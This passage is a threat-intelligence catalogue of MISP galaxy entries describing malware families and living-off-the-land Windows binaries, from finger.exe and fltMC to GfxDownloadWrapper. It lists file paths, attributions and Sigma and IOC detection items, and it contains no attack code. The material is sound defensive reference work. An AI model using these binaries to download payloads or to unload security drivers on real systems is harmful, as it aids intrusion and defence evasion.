Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon
Author: Ruben Revuelta
Paths: * c:\windows\system32\finger.exe * c:\windows\syswow64\finger.exe
Resources: * https://twitter.com/DissectMalware/status/997340270273409024 * https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)
Detection: * Sigma: proc_creation_win_finger_usage.yml * IOC: finger.exe should not be run on a normal workstation. * IOC: finger.exe connecting to external resources.[Finger.exe - LOLBAS Project]
Internal MISP references
UUID a9ce311d-dd8c-497d-b38f-b535d7318ed4 which can be used as unique global reference for Finger in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5110 |
| source | Tidal Cyber |
| tags | ['1da4f610-4c54-46a3-b9b3-c38a002b623e', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
FIVEHANDS
FIVEHANDS is a customized version of DEATHRANSOM ransomware written in C++. FIVEHANDS has been used since at least 2021, including in Ransomware-as-a-Service (RaaS) campaigns, sometimes along with SombRAT.[FireEye FiveHands April 2021][NCC Group Fivehands June 2021]
Internal MISP references
UUID 84187393-2fe9-4136-8720-a6893734ee8c which can be used as unique global reference for FIVEHANDS in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0618 |
| source | MITRE |
| tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', 'f1ad9eba-f4fd-4aec-92c0-833ac14d741b', '5e7433ad-a894-4489-93bc-41e90da90019', '15787198-6c8b-4f79-bf50-258d55072fee', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Flagpro
Flagpro is a Windows-based, first-stage downloader that has been used by BlackTech since at least October 2020. It has primarily been used against defense, media, and communications companies in Japan.[NTT Security Flagpro new December 2021]
Internal MISP references
UUID 977aaf8a-2216-40f0-8682-61dd91638147 which can be used as unique global reference for Flagpro in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0696 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Flame
Flame is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. [Kaspersky Flame]
Internal MISP references
UUID 87604333-638f-4f4a-94e0-16aa825dd5b8 which can be used as unique global reference for Flame in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0143 |
| source | MITRE |
| type | ['malware'] |
FLASHFLOOD
FLASHFLOOD is malware developed by APT30 that allows propagation and exfiltration of data over removable devices. APT30 may use this capability to exfiltrate data across air-gaps. [FireEye APT30]
Internal MISP references
UUID 44a5e62a-6de4-49d2-8f1b-e68ecdf9f332 which can be used as unique global reference for FLASHFLOOD in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0036 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
FlawedAmmyy
FlawedAmmyy is a remote access tool (RAT) that was first seen in early 2016. The code for FlawedAmmyy was based on leaked source code for a version of Ammyy Admin, a remote access software.[Proofpoint TA505 Mar 2018]
Internal MISP references
UUID 308dbe77-3d58-40bb-b0a5-cd00f152dc60 which can be used as unique global reference for FlawedAmmyy in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0381 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
FlawedGrace
FlawedGrace is a fully featured remote access tool (RAT) written in C++ that was first observed in late 2017.[Proofpoint TA505 Jan 2019]
Internal MISP references
UUID c558e948-c817-4494-a95d-ad3207f10e26 which can be used as unique global reference for FlawedGrace in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0383 |
| source | MITRE |
| tags | ['1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '84615fe0-c2a5-4e07-8957-78ebc29b4635', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
FleetDeck
FleetDeck is a commercial remote monitoring and management (RMM) tool that enables remote desktop access and “virtual terminal” capabilities. Government and commercial reports indicate that financially motivated adversaries, including BlackCat (AKA ALPHV or Noberus) actors and Scattered Spider (AKA 0ktapus or UNC3944), have used FleetDeck for command and control and persistence purposes during intrusions.[Cyber Centre ALPHV/BlackCat July 25 2023][CrowdStrike Scattered Spider SIM Swapping December 22 2022]
Internal MISP references
UUID 68758d3a-ec4b-4c19-933d-b4c3000281b2 which can be used as unique global reference for FleetDeck in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5056 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
FLIPSIDE
FLIPSIDE is a simple tool similar to Plink that is used by FIN5 to maintain access to victims. [Mandiant FIN5 GrrCON Oct 2016]
Internal MISP references
UUID 18002747-ddcc-42c1-b0ca-1e598a9f1919 which can be used as unique global reference for FLIPSIDE in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0173 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
fltMC
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Filter Manager Control Program used by Windows
Author: John Lambert
Paths: * C:\Windows\System32\fltMC.exe
Resources: * https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon
Detection: * Sigma: proc_creation_win_fltmc_unload_driver_sysmon.yml * Elastic: defense_evasion_via_filter_manager.toml * Splunk: unload_sysmon_filter_driver.yml * IOC: 4688 events with fltMC.exe[fltMC.exe - LOLBAS Project]
Internal MISP references
UUID 43d57826-cd15-4154-8f04-38351c96986e which can be used as unique global reference for fltMC in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5111 |
| source | Tidal Cyber |
| tags | ['49bbb074-2406-4f27-ad77-d2e433ba1ccb', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
FoggyWeb
FoggyWeb is a passive and highly-targeted backdoor capable of remotely exfiltrating sensitive information from a compromised Active Directory Federated Services (AD FS) server. It has been used by APT29 since at least early April 2021.[MSTIC FoggyWeb September 2021]
Internal MISP references
UUID bc11844e-0348-4eed-a48a-0554d68db38c which can be used as unique global reference for FoggyWeb in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0661 |
| source | MITRE |
| tags | ['8bf128ad-288b-41bc-904f-093f4fdde745'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Forfiles
Forfiles is a Windows utility commonly used in batch jobs to execute commands on one or more selected files or directories (ex: list all directories in a drive, read the first line of all files created yesterday, etc.). Forfiles can be executed from either the command line, Run window, or batch files/scripts. [Microsoft Forfiles Aug 2016]
Internal MISP references
UUID c6dc67a6-587d-4700-a7de-bee043a0031a which can be used as unique global reference for Forfiles in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0193 |
| source | MITRE |
| tags | ['91804406-e20a-4455-8dbc-5528c35f8e20', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
FrameworkPOS
FrameworkPOS is a point of sale (POS) malware used by FIN6 to steal payment card data from sytems that run physical POS devices.[SentinelOne FrameworkPOS September 2019]
Internal MISP references
UUID aef7cbbc-5163-419c-8e4b-3f73bed50474 which can be used as unique global reference for FrameworkPOS in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0503 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
FreeFileSync
FreeFileSync is a tool used to facilitate cloud-based file synchronization.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 1d5c5822-3cb4-455a-9976-f6bc17e2820d which can be used as unique global reference for FreeFileSync in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5032 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '8bf128ad-288b-41bc-904f-093f4fdde745', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
FruitFly
FruitFly is designed to spy on mac users [objsee mac malware 2017].
Internal MISP references
UUID 3a05085e-5a1f-4a74-b489-d679b80e2c18 which can be used as unique global reference for FruitFly in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS'] |
| software_attack_id | S0277 |
| source | MITRE |
| type | ['malware'] |
Fsi
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK.
Author: Jimmy (@bohops)
Paths: * C:\Program Files\dotnet\sdk[sdk version]\FSharp\fsi.exe * C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe
Resources: * https://twitter.com/NickTyrer/status/904273264385589248 * https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Detection: * Elastic: defense_evasion_unusual_process_network_connection.toml * Elastic: defense_evasion_network_connection_from_windows_binary.toml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: Fsi.exe execution may be suspicious on non-developer machines * Sigma: proc_creation_win_lolbin_fsharp_interpreters.yml[Fsi.exe - LOLBAS Project]
Internal MISP references
UUID f2a5e6cb-75fd-4108-9466-80471c7d0422 which can be used as unique global reference for Fsi in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5222 |
| source | Tidal Cyber |
| tags | ['7a4b56fa-5419-411b-86fe-68c9b0ddd3c5', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
FsiAnyCpu
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio.
Author: Jimmy (@bohops)
Paths: * c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe
Resources: * https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Detection: * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: FsiAnyCpu.exe execution may be suspicious on non-developer machines * Sigma: proc_creation_win_lolbin_fsharp_interpreters.yml[FsiAnyCpu.exe - LOLBAS Project]
Internal MISP references
UUID 9e5c41bb-f4cc-4132-8c7a-4a10a006190b which can be used as unique global reference for FsiAnyCpu in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5223 |
| source | Tidal Cyber |
| tags | ['c5d1a687-8a36-4995-b8cb-415f33661821', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Fsutil
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: File System Utility
Author: Elliot Killick
Paths: * C:\Windows\System32\fsutil.exe * C:\Windows\SysWOW64\fsutil.exe
Resources: * https://twitter.com/0gtweet/status/1720724516324704404
Detection: * IOC: fsutil.exe should not be run on a normal workstation * IOC: file setZeroData (not case-sensitive) in the process arguments * IOC: Sysmon Event ID 1 * IOC: Execution of process fsutil.exe with trace decode could be suspicious * IOC: Non-Windows netsh.exe execution * Sigma: proc_creation_win_susp_fsutil_usage.yml[Fsutil.exe - LOLBAS Project]
Internal MISP references
UUID 7a829dae-00cf-4321-95b4-276f7dfb5368 which can be used as unique global reference for Fsutil in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5112 |
| source | Tidal Cyber |
| tags | ['76bb7541-94da-4d66-9a57-77f788330287', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
ftp
ftp is a utility commonly available with operating systems to transfer information over the File Transfer Protocol (FTP). Adversaries can use it to transfer other tools onto a system or to exfiltrate data.[Microsoft FTP][Linux FTP]
Internal MISP references
UUID 062deac9-8f05-44e2-b347-96b59ba166ca which can be used as unique global reference for ftp in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS', 'Linux', 'Windows'] |
| software_attack_id | S0095 |
| source | MITRE |
| tags | ['95d37388-4e95-4d7f-96ba-99d94c842299', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', '8bf128ad-288b-41bc-904f-093f4fdde745'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
FunnyDream
FunnyDream is a backdoor with multiple components that was used during the FunnyDream campaign since at least 2019, primarily for execution and exfiltration.[Bitdefender FunnyDream Campaign November 2020]
Internal MISP references
UUID d0490e1d-8287-44d3-8342-944d1203b237 which can be used as unique global reference for FunnyDream in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1044 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
FYAnti
FYAnti is a loader that has been used by menuPass since at least 2020, including to deploy QuasarRAT.[Securelist APT10 March 2021]
Internal MISP references
UUID be9a2ae5-373a-4dee-9c1e-b54235dafed0 which can be used as unique global reference for FYAnti in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0628 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Fysbis
Fysbis is a Linux-based backdoor used by APT28 that dates back to at least 2014.[Fysbis Palo Alto Analysis]
Internal MISP references
UUID 317a7647-aee7-4ce1-a8f8-33a61190f55d which can be used as unique global reference for Fysbis in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux'] |
| software_attack_id | S0410 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Gazer
Gazer is a backdoor used by Turla since at least 2016. [ESET Gazer Aug 2017]
Internal MISP references
UUID 7a60b984-b0c8-4acc-be24-841f4b652872 which can be used as unique global reference for Gazer in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0168 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Gelsemium
Gelsemium is a modular malware comprised of a dropper (Gelsemine), a loader (Gelsenicine), and main (Gelsevirine) plug-ins written using the Microsoft Foundation Class (MFC) framework. Gelsemium has been used by the Gelsemium group since at least 2014.[ESET Gelsemium June 2021]
Internal MISP references
UUID 9a117508-1d22-4fea-aa65-db670c13a5c9 which can be used as unique global reference for Gelsemium in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0666 |
| source | MITRE |
| type | ['malware'] |
GeminiDuke
GeminiDuke is malware that was used by APT29 from 2009 to 2012. [F-Secure The Dukes]
Internal MISP references
UUID 97f32f68-dcd2-4f80-9967-cc87305dc342 which can be used as unique global reference for GeminiDuke in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0049 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Get2
Get2 is a downloader written in C++ that has been used by TA505 to deliver FlawedGrace, FlawedAmmyy, Snatch and SDBbot.[Proofpoint TA505 October 2019]
Internal MISP references
UUID a997aaaf-edfc-4489-80a9-3f8d64545de1 which can be used as unique global reference for Get2 in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0460 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
GfxDownloadWrapper
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path.
Author: Jesus Galvez
Paths: * c:\windows\system32\driverstore\filerepository\64kb6472.inf_amd64_3daef03bbe98572b\ * c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_0e9c57ae3396e055\ * c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_209bd95d56b1ac2d\ * c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_3fa2a843f8b7f16d\ * c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_85c860f05274baa0\ * c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_f7412e3e3404de80\ * c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_feb9f1cf05b0de58\ * c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_0219cc1c7085a93f\ * c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_df4f60b1cae9b14a\ * c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_16eb18b0e2526e57\ * c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_1c77f1231c19bc72\ * c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_31c60cc38cfcca28\ * c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_82f69cea8b2d928f\ * c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_b4d94f3e41ceb839\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0606619cc97463de\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0e95edab338ad669\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_22aac1442d387216\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2461d914696db722\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_29d727269a34edf5\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2caf76dbce56546d\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_353320edb98da643\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_4ea0ed0af1507894\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_56a48f4f1c2da7a7\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_64f23fdadb76a511\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_668dd0c6d3f9fa0e\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6be8e5b7f731a6e5\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6dad7e4e9a8fa889\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6df442103a1937a4\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_767e7683f9ad126c\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_8644298f665a12c4\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_868acf86149aef5d\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_92cf9d9d84f1d3db\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_93239c65f222d453\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_9de8154b682af864\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_a7428663aca90897\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_ad7cb5e55a410add\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_afbf41cf8ab202d7\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_d193c96475eaa96e\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_db953c52208ada71\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e7523682cc7528cc\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e9f341319ca84274\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f3a64c75ee4defb7\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f51939e52b944f4b\ * c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_4938423c9b9639d7\ * c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_c8e108d4a62c59d5\ * c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_deecec7d232ced2b\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_01ee1299f4982efe\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_02edfc87000937e4\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0541b698fc6e40b0\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0707757077710fff\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0b3e3ed3ace9602a\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0cff362f9dff4228\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_16ed7d82b93e4f68\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1a33d2f73651d989\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1aca2a92a37fce23\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1af2dd3e4df5fd61\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1d571527c7083952\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_23f7302c2b9ee813\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_24de78387e6208e4\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_250db833a1cd577e\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_25e7c5a58c052bc5\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_28d80681d3523b1c\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_2dda3b1147a3a572\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_31ba00ea6900d67d\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_329877a66f240808\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_42af9f4718aa1395\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4645af5c659ae51a\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48c2e68e54c92258\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48e7e903a369eae2\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_491d20003583dabe\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4b34c18659561116\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_51ce968bf19942c2\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_555cfc07a674ecdd\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_561bd21d54545ed3\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_579a75f602cc2dce\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_57f66a4f0a97f1a3\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_587befb80671fb38\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_62f096fe77e085c0\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6ae0ddbb4a38e23c\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6bb02522ea3fdb0d\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6d34ac0763025a06\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_712b6a0adbaabc0a\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_78b09d9681a2400f\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_842874489af34daa\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_88084eb1fe7cebc3\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_89033455cb08186f\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8a9535cd18c90bc3\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8c1fc948b5a01c52\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_9088b61921a6ff9f\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_90f68cd0dc48b625\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_95cb371d046d4b4c\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_a58de0cf5f3e9dca\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_abe9d37302f8b1ae\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_acb3edda7b82982f\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_aebc5a8535dd3184\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b5d4c82c67b39358\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b846bbf1e81ea3cf\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_babb2e8b8072ff3b\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_bc75cebf5edbbc50\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_be91293cf20d4372\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c11f4d5f0bc4c592\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4e5173126d31cf0\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4f600ffe34acc7b\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c8634ed19e331cda\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c9081e50bcffa972\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_ceddadac8a2b489e\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d4406f0ad6ec2581\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d5877a2e0e6374b6\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d8ca5f86add535ef\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_e8abe176c7b553b5\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_eabb3ac2c517211f\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_f8d8be8fea71e1a0\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe5e116bb07c0629\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe73d2ebaa05fb95\ * c:\windows\system32\driverstore\filerepository\igdlh64_kbl_kit127397.inf_amd64_e1da8ee9e92ccadb\ * c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_364f43f2a27f7bd7\ * c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_3f3936d8dec668b8\ * c:\windows\system32\driverstore\filerepository\k127793.inf_amd64_3ab7883eddccbf0f\ * c:\windows\system32\driverstore\filerepository\ki129523.inf_amd64_32947eecf8f3e231\ * c:\windows\system32\driverstore\filerepository\ki126950.inf_amd64_fa7f56314967630d\ * c:\windows\system32\driverstore\filerepository\ki126951.inf_amd64_94804e3918169543\ * 